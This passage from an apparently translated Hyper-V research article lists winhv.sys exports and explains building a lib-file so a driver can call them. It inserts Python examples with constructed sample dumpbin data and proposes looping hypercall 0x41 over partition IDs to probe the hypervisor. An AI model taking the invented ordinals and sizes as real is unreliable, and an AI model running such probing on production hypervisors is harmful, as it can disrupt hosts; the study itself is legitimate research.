<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">WinHvInitializeEventLogBufferGroup </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">WinHvInjectSyntheticMachineCheckEvent </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">WinHvInstallIntercept </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">WinHvLookupPortId </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">WinHvLowMemoryPolicyAutoDeposit </span></div>
</td><td style="border-color: rgb(0, 0, 0); border-style: solid; border-width: 1px 1px 1px 0px; padding: 0px 8px; vertical-align: top;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">WinHvLowMemoryPolicyReturnStatus </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">WinHvMapDeviceInterrupt </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">WinHvMapEventLogBuffer </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">WinHvMapGpaPages </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">WinHvMapSparseGpaPages </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">WinHvMapStatsPage </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">WinHvModifySparseGpaPages </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">WinHvNtProcessorToVpIndex </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">WinHvPostMessage </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">WinHvPrepareForSleep </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">WinHvProcessorIndexToLpIndex </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">WinHvProcessorNumberToVpIndex </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">WinHvQueryInterceptIrql </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">WinHvQueryReferenceCounter </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">WinHvReadGpa </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">WinHvReleaseEventLogBuffer </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">WinHvRemoveLogicalProcessor </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">WinHvReportPresentHypervisor </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">WinHvRestorePartitionState </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">WinHvSavePartitionState </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">WinHvScrubPartition </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">WinHvSetAbsoluteTimer </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">WinHvSetEndOfMessage </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">WinHvSetEventLogCompletedNotificationRoutine</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">WinHvSetEventLogGroupSources </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">WinHvSetLogicalProcessorProperty </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">WinHvSetLogicalProcessorRegisters </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">WinHvSetPartitionProperty </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">WinHvSetPortProperty </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">WinHvSetSint </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">WinHvSetSintOnCurrentProcessor </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">WinHvSetStackwalkEvents </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">WinHvSetVpRegisters </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">WinHvSignalEvent </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">WinHvTranslateVirtualAddress </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">WinHvUnmapDeviceInterrupt </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">WinHvUnmapEventLogBuffer </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">WinHvUnmapGpaPages </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">WinHvUnmapStatsPage </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">WinHvWithdrawAllMemory </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">WinHvWithdrawMemory </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">WinHvWriteGpa </span></div>
</td><td style="border: 1px solid rgb(0, 0, 0); padding: 0px 8px; vertical-align: top;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">WinHvAllocateOverlayPages </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">WinHvDisablePartitionVtl </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">WinHvDisableVpVtl </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">WinHvEnablePartitionVtl </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">WinHvEnableVpVtl </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">WinHvFreeOverlayPages </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">WinHvGetCurrentVpIndex </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">WinHvGetSintEventFlags </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">WinHvGetSintMessage </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">WinHvGetVpRegisters </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">WinHvNtProcessorToVpIndex </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">WinHvPostMessage </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">WinHvProcessorNumberToVpIndex </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">WinHvSetEndOfMessage </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">WinHvSetSint </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">WinHvSetSintOnCurrentProcessor</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">WinHvSetVpRegisters </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">WinHvSignalEvent </span></div>
</td></tr>
</tbody></table>
</div>
<br /><br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 17.85pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">To call the functions exported by winhv.sys, you can either resolve their addresses dynamically at run time (7) or create a lib-file to link against (8). Let's consider the second option.</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 17.85pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">When the functions are declared as stdcall in the def-file (32-bit version of the driver), you must specify their ordinals; otherwise the imported functions will not be found when the driver loads (for some reason, the import table of the hyperv3.sys driver gets an @number postfix on the function name even if the def-file declares WinHvGetPartitionProperty@16 = WinHvGetPartitionProperty):</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 8pt; margin-left: 18pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">WinHvGetPartitionProperty@16 @42</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 8pt; margin-left: 18pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">To create a def-file using the output of dumpbin:</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 8pt; margin-left: 18pt; margin-top: 0pt; text-align: justify; text-indent: 17.4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">dumpbin /exports winhv.sys</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 8pt; margin-left: 18pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">(Windows Server 2016 TP2 uses the winhvr.sys driver in the root partition, so on that OS the def-file has to be generated for that driver instead.)</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 8pt; margin-left: 18pt; margin-top: 0pt; text-align: justify; text-indent: 17.4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">To build a 64-bit driver you do not need to make any changes.</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 8pt; margin-left: 18pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">After editing the def-file, regenerate the lib-file with the command (for x86):</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 8pt; margin-left: 18pt; margin-top: 0pt; text-align: justify; text-indent: 17.4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">lib.exe /def:winhv.def /OUT:winhv.lib /machine:x86 </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 18pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">For x64 (done once for a specific version of winhv.sys):</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 8pt; margin-left: 18pt; margin-top: 0pt; text-align: justify; text-indent: 17.4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">lib.exe /def:winhv64.def /OUT:winhv64.lib /machine:x64</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 8pt; margin-left: 18pt; margin-top: 0pt; text-align: justify; text-indent: 17.4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">(of course, run these commands from the native tools command prompt)</span></div>
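The def-file step above is easy to get wrong by hand for a driver with over a hundred exports, so here is an added example (not the article's own tooling) that turns `dumpbin /exports` output into the def-file that `lib.exe` expects, handling the x86 stdcall case the text describes (`Name@N @ordinal`) and the plain x64 case (`Name @ordinal`). The dumpbin text embedded below is constructed; its ordinals and RVAs are invented, except that WinHvGetPartitionProperty is given ordinal 42 and a 16-byte stdcall frame as shown in the article. The per-function argument sizes for x86 are an assumption the caller must supply, since an undecorated x64 export table does not carry them.

```python
"""Generate a module-definition (.def) file for winhv.sys from `dumpbin /exports`
output, ready for `lib.exe /def:... /OUT:... /machine:...`.

Added example, not the article's code. SAMPLE_DUMPBIN is constructed; ordinals and
RVAs are made up except WinHvGetPartitionProperty (@42, 16 stdcall bytes, from the
article)."""
import re

# Constructed sample of `dumpbin /exports winhv.sys` output, in dumpbin's layout.
SAMPLE_DUMPBIN = """\
Microsoft (R) COFF/PE Dumper Version 14.00.24215.1
Copyright (C) Microsoft Corporation.  All rights reserved.

Dump of file winhv.sys

File Type: EXECUTABLE IMAGE

  Section contains the following exports for winhv.sys

    00000000 characteristics
    5D3E5F2A time date stamp
        0.00 version
           1 ordinal base
           4 number of functions
           4 number of names

    ordinal hint RVA      name

          1    0 00001000 WinHvAcceptGpaPages
         42    1 00001230 WinHvGetPartitionProperty
         43    2 00001300 WinHvGetVpRegisters
         99    3 00001AB0 WinHvSetVpRegisters

  Summary

        1000 .data
"""

# One export row: ordinal, hint (hex), RVA (8 hex digits), exported name.
EXPORT_ROW = re.compile(r"^\s*(\d+)\s+([0-9A-Fa-f]+)\s+([0-9A-Fa-f]{8})\s+(\S+)\s*$")
TABLE_HEADER = re.compile(r"^\s*ordinal\s+hint\s+RVA\s+name\s*$")


def parse_dumpbin_exports(text):
    """Return [(ordinal, name), ...] from the export table of dumpbin /exports output."""
    exports = []
    in_table = False
    for line in text.splitlines():
        if TABLE_HEADER.match(line):
            in_table = True          # rows follow the column header
            continue
        if not in_table:
            continue
        if line.strip().startswith("Summary"):
            break                    # section summary marks the end of the table
        m = EXPORT_ROW.match(line)
        if m:
            exports.append((int(m.group(1)), m.group(4)))
    return exports


def make_def(text, library="winhv.sys", machine="x64", stdcall_bytes=None):
    """Build .def contents for lib.exe.

    x64: exports are undecorated, so `Name @ordinal` is sufficient.
    x86: the driver's import table carries the stdcall decoration `Name@N`
         (N = argument bytes) and the ordinal must be present, so each line is
         written as `Name@N @ordinal`. stdcall_bytes maps name -> N and must
         cover every export; missing entries fail loudly instead of producing an
         import that lib.exe accepts but the loader can never resolve.
    """
    lines = ["LIBRARY %s" % library, "EXPORTS"]
    for ordinal, name in parse_dumpbin_exports(text):
        if machine == "x64":
            lines.append("    %s @%d" % (name, ordinal))
        elif machine == "x86":
            if not stdcall_bytes or name not in stdcall_bytes:
                raise KeyError("stdcall argument size unknown for %s" % name)
            lines.append("    %s@%d @%d" % (name, stdcall_bytes[name], ordinal))
        else:
            raise ValueError("machine must be 'x86' or 'x64'")
    return "\n".join(lines) + "\n"


# Assumed argument sizes for the x86 build; only the value 16 for
# WinHvGetPartitionProperty comes from the article, the rest are placeholders.
X86_STDCALL_BYTES = {
    "WinHvAcceptGpaPages": 20,
    "WinHvGetPartitionProperty": 16,
    "WinHvGetVpRegisters": 24,
    "WinHvSetVpRegisters": 20,
}

if __name__ == "__main__":
    print(make_def(SAMPLE_DUMPBIN, machine="x64"))                               # -> winhv64.def
    print(make_def(SAMPLE_DUMPBIN, machine="x86", stdcall_bytes=X86_STDCALL_BYTES))  # -> winhv.def
```

Redirect the two outputs to winhv64.def and winhv.def and feed them to the `lib.exe` commands above; because the ordinals are read from the same binary you will link against, the generated lib-file is tied to that exact winhv.sys version, which is why the text says the x64 step is repeated per version.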
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 18pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Let's try issuing hypercall 0x41 (HvInitializePartition) in a loop from 0 to 0x100, with the PartitionID in ECX equal to the loop iterator and the Fast bit set (to pass parameters through registers); EAX returns the hypervisor's result.</span></div>
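The value 10041h that the loop loads into EAX is the hypercall input value from the Hypervisor Top Level Functional Specification (TLFS): call code 0x41 in bits 15:0 with the Fast bit (bit 16) set, and EDX cleared because the 64-bit value travels in EDX:EAX on x86. The following added example (not code from the article) encodes and decodes these values per the TLFS layout, so the status that comes back in EAX can be read by name; the HV_STATUS names and the bit positions are TLFS constants, and only HVCALL 0x41 comes from the article.

```python
"""Encode Hyper-V hypercall input values and decode result values according to
the TLFS bit layout. Added example, not the article's code."""

# Hypercall input value (64 bits), per the TLFS
CALL_CODE_MASK = 0xFFFF        # bits 15:0   call code
FAST_BIT = 1 << 16             # bit 16      fast hypercall: parameters in registers
REP_COUNT_SHIFT = 32           # bits 43:32  rep count (rep hypercalls only)
REP_START_SHIFT = 48           # bits 59:48  rep start index
FIELD12_MASK = 0xFFF           # width of the two 12-bit rep fields

# Hypercall result value, per the TLFS
RESULT_MASK = 0xFFFF           # bits 15:0   HV_STATUS
REPS_COMPLETE_SHIFT = 32       # bits 43:32  reps completed

HVCALL_INITIALIZE_PARTITION = 0x41   # the call code used by the article's loop

HV_STATUS = {                        # subset of TLFS HV_STATUS codes
    0x0000: "HV_STATUS_SUCCESS",
    0x0002: "HV_STATUS_INVALID_HYPERCALL_CODE",
    0x0003: "HV_STATUS_INVALID_HYPERCALL_INPUT",
    0x0004: "HV_STATUS_INVALID_ALIGNMENT",
    0x0005: "HV_STATUS_INVALID_PARAMETER",
    0x0006: "HV_STATUS_ACCESS_DENIED",
    0x0007: "HV_STATUS_INVALID_PARTITION_STATE",
    0x0008: "HV_STATUS_OPERATION_DENIED",
    0x000D: "HV_STATUS_INVALID_PARTITION_ID",
}


def encode_hypercall_input(call_code, fast=False, rep_count=0, rep_start=0):
    """Compose the 64-bit hypercall input value; rejects out-of-range fields."""
    if not 0 <= call_code <= CALL_CODE_MASK:
        raise ValueError("call code must fit in 16 bits")
    if not 0 <= rep_count <= FIELD12_MASK or not 0 <= rep_start <= FIELD12_MASK:
        raise ValueError("rep count / rep start must fit in 12 bits")
    value = call_code
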